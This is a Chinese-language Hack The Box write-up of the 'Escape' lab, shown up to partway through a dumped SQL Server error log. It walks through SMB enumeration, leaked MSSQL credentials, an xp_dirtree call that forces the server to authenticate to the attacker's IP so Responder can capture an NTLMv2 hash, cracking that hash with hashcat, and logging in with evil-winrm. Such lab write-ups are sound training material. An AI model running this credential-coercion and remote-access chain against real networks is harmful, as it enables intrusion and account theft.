Escape-htb-writeup

0x00 靶场技能介绍

章节技能：多次端口开放扫描识别、SMB匿名访问、域环境登录mssql数据库、域环境在MSSQL数据中使用EXEC xp_dirtree函数进行获取 Net-NTLMv2 值、Responder、.BAK备份文件泄密、ADCS利用、Certify.exe、certipy-ad、openssl、Rubeus.exe

参考链接：https://0xdf.gitlab.io/2023/06/17/htb-escape.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.202

2、这台靶机的端口扫描部分，存在问题，不知道是我的网络问题，还是我挂的openvpn的配置原因，暂时先这样了，目前的扫描结果是不准的，缺少一些端口信息的。

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.202                      
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 05:35 CST
Nmap scan report for sequel.htb (10.10.11.202)
Host is up (0.24s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3269/tcp open  globalcatLDAPssl
9389/tcp open  adws

Nmap done: 1 IP address (1 host up) scanned in 22.97 seconds
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,135,139,445,3269,9389 -sV -sC 10.10.11.202 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 05:36 CST
Nmap scan report for sequel.htb (10.10.11.202)
Host is up (0.36s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-21T21:38:59+00:00; +52s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2022-11-18T21:05:34
|_Not valid after:  2023-11-18T21:05:34
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 49s, deviation: 3s, median: 46s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-21T21:38:15
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.99 seconds

3、先绑定下hosts信息吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.202 sequel.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.202 sequel.htb

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.202 dc.sequel.htb" | sudo tee -a /etc/hosts
10.10.11.202 dc.sequel.htb

4、通过SMB协议，发现了一些可以匿名访问的共享目录

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.11.202 -u 'guest' 

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.11.202:445        Name: sequel.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Public                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.11.202 -N           

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Public          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.202\\Public -N  
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 19:51:25 2022
  ..                                  D        0  Sat Nov 19 19:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 21:39:43 2022

                5184255 blocks of size 4096. 1475945 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (34.7 KiloBytes/sec) (average 34.7 KiloBytes/sec)
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.11.202\\SYSVOL -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit

5、在共享目录里还是发现了一些信息，存在一个SQL Server Procedures.pdf文件

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool ./SQL\ Server\ Procedures.pdf 
ExifTool Version Number         : 12.70
File Name                       : SQL Server Procedures.pdf
Directory                       : .
File Size                       : 50 kB
File Modification Date/Time     : 2024:04:22 05:16:12+08:00
File Access Date/Time           : 2024:04:22 05:16:12+08:00
File Inode Change Date/Time     : 2024:04:22 05:16:12+08:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 2
Creator                         : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/0.15.6 Chrome/100.0.4896.160 Electron/18.3.5 Safari/537.36
Producer                        : Skia/PDF m100
Create Date                     : 2022:11:18 13:39:43+00:00
Modify Date                     : 2022:11:18 13:39:43+00:00

6、通过查看该PDF文件，发现了很多有用的信息

Ryan
Tom
brandon.brown

自去年以来，我们的SQL Server发生了相当多的事故（看看你，Ryan，你的实例在DC上，你为什么要在DC上放一个模拟实例？！）。因此，Tom决定编写一个关于如何访问数据库的基本过程，然后测试对数据库的任何更改。当然，这些都不会在实时服务器上完成，我们将DC模型克隆到专用服务器上。

Tom度假回来后会立即从DC中删除该实例。

这份文件背后的第二个原因是，当没有高年级学生可以为所有低年级学生提供指导时，它就像一个指南。

从Domain Joined计算机中删除

cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<userame>" /pass:<password>

brandon.brown@sequel.htb

可以偷看数据库与用户PublicUser和密码GuestUserCantWrite1。

请参阅前面的指导原则，并确保将“Windows身份验证”切换到“SQL Server身份验证”。

7、通过这个PDF文档，发现可以使用上面的账号密码去登录数据库

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (PublicUser  guest@master)> SELECT @@version;
                                                                                                                                                                                                                           
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
        Sep 24 2019 13:48:23 
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
   

SQL (PublicUser  guest@master)> SELECT name FROM sys.databases;
name     
------   
master   

tempdb   

model    

msdb     

SQL (PublicUser  guest@master)>



到这里可以看出来都是一些默认的库；


SQL (PublicUser  guest@master)> select db_name();
         
------   
master   

SQL (PublicUser  guest@master)> select * from master;
[-] ERROR(DC\SQLMOCK): Line 1: Invalid object name 'master'.
SQL (PublicUser  guest@master)> SELECT * FROM master.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME         TABLE_TYPE   
-------------   ------------   ----------------   ----------   
master          dbo            spt_fallback_db    b'BASE TABLE'   

master          dbo            spt_fallback_dev   b'BASE TABLE'   

master          dbo            spt_fallback_usg   b'BASE TABLE'   

master          dbo            spt_values         b'VIEW'      

master          dbo            spt_monitor        b'BASE TABLE'   

SQL (PublicUser  guest@master)> select * from spt_fallback_db;
xserver_name   xdttm_ins   xdttm_last_ins_upd   xfallback_dbid   name   dbid   status   version   
------------   ---------   ------------------   --------------   ----   ----   ------   -------   
SQL (PublicUser  guest@master)> select * from spt_fallback_dev;
xserver_name   xdttm_ins   xdttm_last_ins_upd   xfallback_low   xfallback_drive   low   high   status   name   phyname   
------------   ---------   ------------------   -------------   ---------------   ---   ----   ------   ----   -------   
SQL (PublicUser  guest@master)> select * from spt_fallback_usg;
xserver_name   xdttm_ins   xdttm_last_ins_upd   xfallback_vstart   dbid   segmap   lstart   sizepg   vstart   
------------   ---------   ------------------   ----------------   ----   ------   ------   ------   ------   
SQL (PublicUser  guest@master)>
SQL (PublicUser  guest@master)> select * from spt_monitor;
   lastrun   cpu_busy   io_busy   idle   pack_received   pack_sent   connections   pack_errors   total_read   total_write   total_errors   
----------   --------   -------   ----   -------------   ---------   -----------   -----------   ----------   -----------   ------------   
2019-09-24 14:21:40         30        30   7220              39          39            53             0            0             0              0

8、数据库是啥都没有，看来只能尝试命令执行下看看了

SQL (PublicUser  guest@master)> EXECUTE xp_cmdshell 'whoami';
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (PublicUser  guest@master)> EXECUTE sp_configure 'show advanced options', 1;
[-] ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
SQL (PublicUser  guest@master)>

9、到这里会发现，基本上也是啥都利用不了，但是这里因为是域环境下，还涉及到一个 NTLMv2的攻击手法：数据库中没有有用的数据，不能运行命令。接下来要尝试的是让SQL服务器连接回我的主机并进行身份验证，并捕获可以尝试暴力破解的challenge/response。在Querier和Getting Creds via NTLMv2中都展示了这一点。在这里启动Responder作为root监听tun0接口的一堆服务，唯一关心的是SMB。现在告诉MSSQL读取主机上共享的文件:

10、获取并破解 Net-NTLMv2 哈希值-在kali机上启动Responder

SQL (PublicUser  guest@master)> EXEC xp_dirtree '\\10.10.14.38\share', 1, 1
subdirectory   depth   file   
------------   -----   ----   
SQL (PublicUser  guest@master)> 


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0                                                      
[sudo] kali 的密码：
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.38]
    Responder IPv6             [dead:beef:2::1024]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-8GSNASW7PYB]
    Responder Domain Name      [MM6H.LOCAL]
    Responder DCE-RPC Port     [45486]

[+] Listening for events...                                                                                                                                

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:0d281f80bb3f3edb:88738D5319CAE1701770F4C1CA15C7F4:010100000000000080566F663C95DA01C489BD9CA8E76E2000000000020008004D004D003600480001001E00570049004E002D003800470053004E00410053005700370050005900420004003400570049004E002D003800470053004E0041005300570037005000590042002E004D004D00360048002E004C004F00430041004C00030014004D004D00360048002E004C004F00430041004C00050014004D004D00360048002E004C004F00430041004C000700080080566F663C95DA0106000400020000000800300030000000000000000000000000300000A7A923F809CC8FF3BD540B57D07CCA58F870BAC005E73F4A3BB086AA591095E80A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330038000000000000000000

11、进行密码破解

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "NTLMv2"  
   5600 | NetNTLMv2                                                  | Network Protocol
  27100 | NetNTLMv2 (NT)                                             | Network Protocol
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 5600 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码：
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

SQL_SVC::sequel:0d281f80bb3f3edb:88738d5319cae1701770f4c1ca15c7f4:010100000000000080566f663c95da01c489bd9ca8e76e2000000000020008004d004d003600480001001e00570049004e002d003800470053004e00410053005700370050005900420004003400570049004e002d003800470053004e0041005300570037005000590042002e004d004d00360048002e004c004f00430041004c00030014004d004d00360048002e004c004f00430041004c00050014004d004d00360048002e004c004f00430041004c000700080080566f663c95da0106000400020000000800300030000000000000000000000000300000a7a923f809cc8ff3bd540b57d07cca58f870bac005e73f4a3bb086aa591095e80a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00330038000000000000000000:REGGIE1234ronnie
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:0d281f80bb3f3edb:88738d5319cae17017...000000
Time.Started.....: Tue Apr 23 05:16:14 2024 (7 secs)
Time.Estimated...: Tue Apr 23 05:16:21 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1573.5 kH/s (0.57ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10700800/14344385 (74.60%)
Rejected.........: 0/10700800 (0.00%)
Restore.Point....: 10699776/14344385 (74.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: REJONTE -> REDOCEAN22
Hardware.Mon.#1..: Util: 84%

Started: Tue Apr 23 05:16:14 2024
Stopped: Tue Apr 23 05:16:22 2024

12、到这里就获取到了账号和密码了，下面开始验证该账号密码是否可用

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie' --shares      
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\sql_svc:REGGIE1234ronnie 
SMB         10.10.11.202    445    DC               [+] Enumerated shares
SMB         10.10.11.202    445    DC               Share           Permissions     Remark
SMB         10.10.11.202    445    DC               -----           -----------     ------
SMB         10.10.11.202    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.202    445    DC               C$                              Default share
SMB         10.10.11.202    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.202    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.202    445    DC               Public          READ            
SMB         10.10.11.202    445    DC               SYSVOL          READ            Logon server share

13、那就使用这个账号进行登录吧，并尝试枚举一些信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'                                                   
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami
sequel\sql_svc
*Evil-WinRM* PS C:\Users\sql_svc\Documents> dir C:\Users


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:58 AM                Administrator
d-r---        7/20/2021  12:23 PM                Public
d-----         2/1/2023   6:37 PM                Ryan.Cooper
d-----         2/7/2023   8:10 AM                sql_svc


*Evil-WinRM* PS C:\Users\sql_svc\Documents> 


*Evil-WinRM* PS C:\Users\sql_svc\Documents> cd C:/
*Evil-WinRM* PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/1/2023   8:15 PM                PerfLogs
d-r---         2/6/2023  12:08 PM                Program Files
d-----       11/19/2022   3:51 AM                Program Files (x86)
d-----       11/19/2022   3:51 AM                Public
d-----         2/1/2023   1:02 PM                SQLServer
d-r---         2/1/2023   1:55 PM                Users
d-----         2/6/2023   7:21 AM                Windows


*Evil-WinRM* PS C:\> cd SQLServer
*Evil-WinRM* PS C:\SQLServer> ls


    Directory: C:\SQLServer


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:06 AM                Logs
d-----       11/18/2022   1:37 PM                SQLEXPR_2019
-a----       11/18/2022   1:35 PM        6379936 sqlexpress.exe
-a----       11/18/2022   1:36 PM      268090448 SQLEXPR_x64_ENU.exe


*Evil-WinRM* PS C:\SQLServer> cd Logs
*Evil-WinRM* PS C:\SQLServer\Logs> ls


    Directory: C:\SQLServer\Logs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK


*Evil-WinRM* PS C:\SQLServer\Logs> download ERRORLOG.BAK
                                        
Info: Downloading C:\SQLServer\Logs\ERRORLOG.BAK to ERRORLOG.BAK
                                        
Info: Download successful!
*Evil-WinRM* PS C:\SQLServer\Logs>

14、在枚举的时候，发现了一些可疑文件，并下载了下来，开始分析这些可疑文件

┌──(kali㉿offsec)-[~/Desktop]
└─$ file ERRORLOG.BAK                                                                                                  
ERRORLOG.BAK: Unicode text, UTF-16, little-endian text, with very long lines (508), with CRLF line terminators
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat ERRORLOG.BAK 
��2022-11-18 13:43:05.96 Server      Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
        Sep 24 2019 13:48:23 
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)

2022-11-18 13:43:05.97 Server      UTC adjustment: -8:00
2022-11-18 13:43:05.97 Server      (c) Microsoft Corporation.
2022-11-18 13:43:05.97 Server      All rights reserved.
2022-11-18 13:43:05.97 Server      Server process ID is 3788.
2022-11-18 13:43:05.97 Server      System Manufacturer: 'VMware, Inc.', System Model: 'VMware7,1'.
2022-11-18 13:43:05.97 Server      Authentication mode is MIXED.
2022-11-18 13:43:05.97 Server      Logging SQL Server messages in file 'C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG'.
2022-11-18 13:43:05.97 Server      The service account is 'NT Service\MSSQL$SQLMOCK'. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server      Registry startup parameters: 
         -d C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\master.mdf
         -e C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG
         -l C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf
2022-11-18 13:43:05.97 Server      Command Line Startup Parameters:
         -s "SQLMOCK"
         -m "SqlSetup"
         -Q
         -q "SQL_Latin1_General_CP1_CI_AS"
         -T 4022
         -T 4010
         -T 3659
         -T 3610
         -T 8015
2022-11-18 13:43:05.97 Server      SQL Server detected 1 sockets with 1 cores per socket and 1 logical processors per socket, 1 total logical processors; using 1 logical processors based on SQL Server licensing. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server      SQL Server is starting at normal priority base (=7). This is an informational message only. No user action is required.
2022-11-18 13:43:05.97 Server      Detected 2046 MB of RAM. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server      Using conventional memory in the memory manager.
2022-11-18 13:43:05.97 Server      Page exclusion bitmap is enabled.
2022-11-18 13:43:05.98 Server      Buffer Pool: Allocating 262144 bytes for 166158 hashPages.
2022-11-18 13:43:06.01 Server      Default collation: SQL_Latin1_General_CP1_CI_AS (us_english 1033)
2022-11-18 13:43:06.04 Server      Buffer pool extension is already disabled. No action is necessary.
2022-11-18 13:43:06.06 Server      Perfmon counters for resource governor pools and groups failed to initialize and are disabled.
2022-11-18 13:43:06.07 Server      Query Store settings initialized with enabled = 1, 
2022-11-18 13:43:06.07 Server      This instance of SQL Server last reported using a process ID of 5116 at 11/18/2022 1:43:04 PM (local) 11/18/2022 9:43:04 PM (UTC). This is an informational message only; no user action is required.
2022-11-18 13:43:06.07 Server      Node configuration: node 0: CPU mask: 0x0000000000000001:0 Active CPU mask: 0x0000000000000001:0. This message provides a description of the NUMA configuration for this computer. This is an informational message only. No user action is required.
2022-11-18 13:43:06.07 Server      Using dynamic lock allocation.  Initial allocation of 2500 Lock blocks and 5000 Lock Owner blocks per node.  This is an informational message only.  No user action is required.
2022-11-18 13:43:06.08 Server      In-Memory OLTP initialized on lowend machine.
2022-11-18 13:43:06.08 Server      The maximum number of dedicated administrator connections for this instance is '1'
2022-11-18 13:43:06.09 Server      [INFO] Created Extended Events session 'hkenginexesession'

2022-11-18 13:43:06.09 Server      Database Instant File Initialization: disabled. For security and performance considerations see the topic 'Database Instant File Initialization' in SQL Server Books Online. This is an informational message only. No user action is required.
2022-11-18 13:43:06.10 Server      CLR version v4.0.30319 loaded.
2022-11-18 13:43:06.10 Server      Total Log Writer threads: 1. This is an informational message; no user action is required.
2022-11-18 13:43:06.13 Server      Database Mirroring Transport is disabled in the endpoint configuration.
2022-11-18 13:43:06.13 Server      clflushopt is selected for pmem flush operation.
2022-11-18 13:43:06.14 Server      Software Usage Metrics is disabled.
2022-11-18 13:43:06.14 spid9s      Warning ******************
2022-11-18 13:43:06.36 spid9s      SQL Server started in single-user mode. This an informational message only. No user action is required.
2022-11-18 13:43:06.36 Server      Common language runtime (CLR) functionality initialized using CLR version v4.0.30319 from C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.
2022-11-18 13:43:06.37 spid9s      Starting up database 'master'.
2022-11-18 13:43:06.38 spid9s      The tail of the log for database master is being rewritten to match the new sector size of 4096 bytes.  2048 bytes at offset 419840 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf will be written.
2022-11-18 13:43:06.39 spid9s      Converting database 'master' from version 897 to the current version 904.
2022-11-18 13:43:06.39 spid9s      Database 'master' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.40 spid9s      Database 'master' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.41 spid9s      Database 'master' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.41 spid9s      Database 'master' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.41 spid9s      Database 'master' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.52 spid9s      Database 'master' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:06.52 spid9s      Database 'master' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:06.72 spid9s      SQL Server Audit is starting the audits. This is an informational message. No user action is required.
2022-11-18 13:43:06.72 spid9s      SQL Server Audit has started the audits. This is an informational message. No user action is required.
2022-11-18 13:43:06.74 spid9s      SQL Trace ID 1 was started by login "sa".
2022-11-18 13:43:06.74 spid9s      Server name is 'DC\SQLMOCK'. This is an informational message only. No user action is required.
2022-11-18 13:43:06.75 spid14s     Starting up database 'mssqlsystemresource'.
2022-11-18 13:43:06.75 spid9s      Starting up database 'msdb'.
2022-11-18 13:43:06.75 spid18s     Password policy update was successful.
2022-11-18 13:43:06.76 spid14s     The resource database build version is 15.00.2000. This is an informational message only. No user action is required.
2022-11-18 13:43:06.78 spid9s      The tail of the log for database msdb is being rewritten to match the new sector size of 4096 bytes.  3072 bytes at offset 50176 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\MSDBLog.ldf will be written.
2022-11-18 13:43:06.78 spid9s      Converting database 'msdb' from version 897 to the current version 904.
2022-11-18 13:43:06.78 spid9s      Database 'msdb' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.79 spid14s     Starting up database 'model'.
2022-11-18 13:43:06.79 spid9s      Database 'msdb' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.80 spid14s     The tail of the log for database model is being rewritten to match the new sector size of 4096 bytes.  512 bytes at offset 73216 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\modellog.ldf will be written.
2022-11-18 13:43:06.80 spid9s      Database 'msdb' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.81 spid14s     Converting database 'model' from version 897 to the current version 904.
2022-11-18 13:43:06.81 spid14s     Database 'model' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.81 spid9s      Database 'msdb' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.81 spid14s     Database 'model' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.81 spid9s      Database 'msdb' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.82 spid14s     Database 'model' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.88 spid18s     A self-generated certificate was successfully loaded for encryption.
2022-11-18 13:43:06.88 spid18s     Server local connection provider is ready to accept connection on [ \\.\pipe\SQLLocal\SQLMOCK ].
2022-11-18 13:43:06.88 spid18s     Dedicated administrator connection support was not started because it is disabled on this edition of SQL Server. If you want to use a dedicated administrator connection, restart SQL Server using the trace flag 7806. This is an informational message only. No user action is required.
2022-11-18 13:43:06.88 spid18s     SQL Server is now ready for client connections. This is an informational message; no user action is required.
2022-11-18 13:43:06.88 Server      SQL Server is attempting to register a Service Principal Name (SPN) for the SQL Server service. Kerberos authentication will not be possible until a SPN is registered for the SQL Server service. This is an informational message. No user action is required.
2022-11-18 13:43:06.88 spid14s     Database 'model' running the upgrade step from version 900 to version 901.
